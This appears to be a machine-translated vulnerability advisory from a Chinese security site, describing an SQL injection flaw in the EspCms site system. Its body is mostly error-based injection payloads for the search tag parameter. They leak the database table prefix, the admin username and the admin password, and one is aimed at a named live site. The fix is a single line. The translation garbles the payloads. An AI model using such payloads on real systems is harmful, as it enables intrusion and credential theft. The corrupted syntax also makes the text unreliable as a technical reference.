EspCms site system injection vulnerability and fix-vulnerability warning-the black bar safety net

2011-11-30T00:00:00
ID MYHACK58:62201132480
Type myhack58
Reporter 佚名
Modified 2011-11-30T00:00:00

Description

The injection point(burst table prefix: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema. the tables where table_schema=database() limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3

Proof username:

www.badguest.cn/ index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from the prefix _admin_member limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3)

Explosion password: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from the prefix _admin_member limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a)%2 3

Fix: the filter index. the php page corresponding to the parameter input